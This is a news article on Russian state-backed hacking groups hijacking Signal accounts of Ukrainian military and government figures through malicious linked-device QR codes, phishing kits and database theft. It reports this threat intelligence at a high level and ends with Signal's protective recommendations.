Russian state-sponsored hackers are intensifying their efforts to compromise Signal messenger accounts, particularly targeting Ukrainian military personnel, government officials, and other influential figures. Cybersecurity experts have issued warnings that these attacks on Signal are part of a broader espionage campaign by Moscow to gain access to sensitive communications that could aid in their war efforts against Ukraine.
The widespread use of Signal among military members, politicians, journalists, and activists has made it a prime target for Russian hackers, according to a report from Google’s security team. While Signal is the main focus, other messaging platforms like WhatsApp and Telegram have also been subject to similar targeting tactics.
Ukrainian cybersecurity officials have previously alerted about Russian hacker groups exploiting vulnerabilities in Signal to gain access to government and defense officials’ communications. The hackers primarily use phishing attacks to deliver malware that allows them to spy on their victims.
One of the innovative techniques uncovered by Google involves exploiting Signal’s legitimate “linked devices” feature. Hackers have found ways to abuse this feature by crafting malicious QR codes that, when scanned by a target, give the attacker control over the victim’s Signal account, enabling real-time message interception.
Hackers distribute these malicious QR codes through various methods, including phishing campaigns, military-themed phishing pages targeting Ukrainian military personnel, and even linking Signal accounts from seized Ukrainian devices to attacker-controlled systems for intelligence gathering.
Russian state-affiliated hacking groups, such as Sandworm, UNC4221, and UNC5792, have been identified as key players in these cyber espionage campaigns. Sandworm, also known as APT44, has been instrumental in hijacking Signal accounts from battlefield devices. UNC4221 has developed a Signal phishing kit to mimic Ukrainian military applications and collect user data and geolocation information. UNC5792 has been modifying legitimate Signal group invites to redirect users to phishing links.
These threat actors have also developed methods to steal Signal database files from Android and Windows devices using malware like Wavesign, PowerShell scripts, Chisel malware, and even leveraging tools like Robocopy for exfiltration.
The evolving threat landscape driven by wartime demands for sensitive communications access poses a risk not only to Ukraine but potentially to other at-risk communities worldwide as well. Secure messaging applications like Signal, despite strong encryption, remain attractive targets for state-sponsored espionage.
In response to these threats, Signal has been enhancing its security features, urging users to take precautions like verifying QR codes, updating the app regularly, monitoring linked devices, and enabling multi-factor authentication. It is crucial for users, especially those in high-risk environments, to remain vigilant against phishing attacks and espionage techniques targeting secure messaging platforms like Signal.